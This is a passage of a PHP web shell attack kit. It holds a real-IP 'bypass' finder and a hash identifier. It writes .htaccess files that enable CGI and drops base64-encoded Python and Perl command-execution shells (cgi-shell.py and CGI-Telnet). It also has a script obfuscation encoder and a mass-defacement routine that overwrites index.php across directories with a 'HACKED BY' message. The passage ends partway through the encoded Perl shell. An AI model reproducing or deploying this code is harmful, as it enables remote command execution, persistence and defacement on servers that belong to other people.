name="krz">\r\n\t<option>ftp</option>\r\n\t\t<option>direct-conntect</option>\r\n\t\t\t<option>webmail</option>\r\n\t\t\t\t<option>cpanel</option>\r\n</select>\r\n<input class="inputz" type="text" name="target" value="url">\r\n<input class="inputzbut" type="submit" value="Bypass"></center>\r\n\r\n\';\r\n\r\n$target = $_POST[\'target\'];\r\n# Bypass From FTP\r\nif($_POST[\'krz\'] == "ftp") {\r\n$ftp = gethostbyname("ftp."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$ftp</font></p>";\r\n} \r\n# Bypass From Direct-Connect\r\nif($_POST[\'krz\'] == "direct-conntect") {\r\n$direct = gethostbyname("direct-connect."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$direct</font></p>";\r\n}\r\n# Bypass From Webmail\r\nif($_POST[\'krz\'] == "webmail") {\r\n$web = gethostbyname("webmail."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$web</font></p>";\r\n}\r\n# Bypass From Cpanel\r\nif($_POST[\'krz\'] == "cpanel") {\r\n$cpanel = gethostbyname("cpanel."."$target");\r\necho "<br><p align=\'center\' dir=\'ltr\'><font face=\'Tahoma\' size=\'2\' color=\'#00ff00\'>Correct \r\nip is : </font><font face=\'Tahoma\' size=\'2\' color=\'#F68B1F\'>$cpanel</font></p>";\r\n}\r\n}\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hashid\')) {\r\nif(isset($_POST[\'gethash\'])){\r\n\t\t$hash = $_POST[\'hash\'];\r\n\t\tif(strlen($hash)==32){\r\n\t\t\t$hashresult = "MD5 Hash";\r\n\t\t}elseif(strlen($hash)==40){\r\n\t\t\t$hashresult = "SHA-1 Hash/ /MySQL5 Hash";\r\n\t\t}elseif(strlen($hash)==13){\r\n\t\t\t$hashresult = "DES(Unix) Hash";\r\n\t\t}elseif(strlen($hash)==16){\r\n\t\t\t$hashresult = "MySQL Hash / /DES(Oracle Hash)";\r\n\t\t}elseif(strlen($hash)==41){\r\n\t\t\t$GetHashChar = substr($hash, 40);\r\n\t\t\tif($GetHashChar == "*"){\r\n\t\t\t\t$hashresult = "MySQL5 Hash"; \r\n\t\t\t}\t\r\n\t\t}elseif(strlen($hash)==64){\r\n\t\t\t$hashresult = "SHA-256 Hash";\r\n\t\t}elseif(strlen($hash)==96){\r\n\t\t\t$hashresult = "SHA-384 Hash";\r\n\t\t}elseif(strlen($hash)==128){\r\n\t\t\t$hashresult = "SHA-512 Hash";\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$1$\')){\r\n\t\t\t\t$hashresult = "MD5(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==37){\r\n\t\t\tif(strstr($hash, \'$apr1$\')){\r\n\t\t\t\t$hashresult = "MD5(APR) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$H$\')){\r\n\t\t\t\t$hashresult = "MD5(phpBB3) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==34){\r\n\t\t\tif(strstr($hash, \'$P$\')){\r\n\t\t\t\t$hashresult = "MD5(Wordpress) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$5$\')){\r\n\t\t\t\t$hashresult = "SHA-256(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==39){\r\n\t\t\tif(strstr($hash, \'$6$\')){\r\n\t\t\t\t$hashresult = "SHA-512(Unix) Hash";\r\n\t\t\t} \t\r\n\t\t}elseif(strlen($hash)==24){\r\n\t\t\tif(strstr($hash, \'==\')){\r\n\t\t\t\t$hashresult = "MD5(Base-64) Hash";\r\n\t\t\t} \t\r\n\t\t}else{\r\n\t\t\t$hashresult = "Hash type not found";\r\n\t\t}\r\n\t}else{\r\n\t\t$hashresult = "Not Hash Entered";\r\n\t}\r\n\t\r\n\t?>\r\n\t<center><br><Br><br>\r\n\t\r\n\t\t<form action="" method="POST">\r\n\t\t<tr>\r\n\t\t<table class="tabnet">\r\n\t\t<th colspan="5">Hash Identification</th>\r\n\t\t<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>\t<td><input type="text" name="hash" size=\'60\' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>\r\n\t\t<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>\r\n\t</table></tr></form>\r\n\t</center>\r\n\t\r\n\t<?php\r\n }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'python\')) { \r\necho "<center/><br/><b>\r\n +--==[ python  Bypass Exploit ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'python\', 0755);\r\n    chdir(\'python\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n\r\n$file = fopen("python.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($pythonp));\r\nfclose($file);\r\n    chmod("python.izo",0755);\r\n   echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'string\')){\r\n$text = $_POST[\'code\'];\r\n?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>\r\n<form method="post"><br><br><br>\r\n<textarea class=\'inputz\' cols=80 rows=10 name="code"></textarea><br><br>\r\n<select class=\'inputz\' size="1" name="ope">\r\n<option value="base64">Base64</option>\r\n<option value="gzinflate">str_rot13 - gzinflate - base64</option>\r\n<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>\r\n</select>&nbsp;<input class=\'inputzbut\' type=\'submit\' name=\'submit\' value=\'Encrypt\'>\r\n<input class=\'inputzbut\' type=\'submit\' name=\'submits\' value=\'Decrypt\'>\r\n</form>\r\n\r\n<?php \r\n$submit = $_POST[\'submit\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_encode($text);\r\nbreak;case \'str\' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));\r\nbreak;case \'gzinflate\' : $codi=base64_encode(gzdeflate(str_rot13($text)));\r\nbreak;default:break;}}\r\n\r\n$submit = $_POST[\'submits\'];\r\nif (isset($submit)){\r\n$op = $_POST["ope"];\r\nswitch ($op) {case \'base64\': $codi=base64_decode($text);\r\nbreak;case \'str\' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));\r\nbreak;case \'gzinflate\' : $codi=str_rot13(gzinflate(base64_decode($text)));\r\nbreak;default:break;}}\r\n\r\necho \'<textarea cols=80 rows=10 class="inputz" readonly>\'.$codi.\'</textarea></center><BR><BR>\';\r\n\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mass\'))\r\n{\r\necho "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";\r\nerror_reporting(0);?>\r\n<form ENCTYPE="multipart/form-data" action="<?php $_SERVER[\'PHP_SELF\']?>" method=\'post\'>\r\n<td><table><table class="tabnet" >\r\n<form hethot=\'post\'>\r\n<tr>\r\n\t<tr>\r\n\t<td>&nbsp;&nbsp;Folder</td><td><input class =\'inputz\' type=\'text\' name=\'path\' size=\'60\' value="<?php echo getcwd();?>"></td>\r\n\t</tr><br>\r\n\t<tr>\r\n\t<td>file name</td><td><input class =\'inputz\' type=\'text\' name=\'file\' size=\'60\' value="index.php"></td>\r\n\t</tr>\r\n</tr>\r\n<th colspan=\'2\'><b>Index code</b></th><br></table>\r\n<textarea style=\'background:black;outline:none;\' name=\'index\' rows=\'10\' cols=\'67\'>HACKED BY X\'1N73CT,PATCH YOUR SECURITY SYSTEM</textarea><br>\r\n<center><input class=\'inputzbut\' type=\'submit\' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>\r\n\r\n<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi\')) { \r\necho "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1  Bypass Exploit]==--+ </font></b><br><br>";\r\n mkdir(\'cgitelnet1\', 0755);\r\n    chdir(\'cgitelnet1\');      \r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\r\nAddType application/x-httpd-cgi .cin\r\n\r\nAddHandler cgi-script .cin\r\nAddHandler cgi-script .cin";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgishellizocin = \'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwY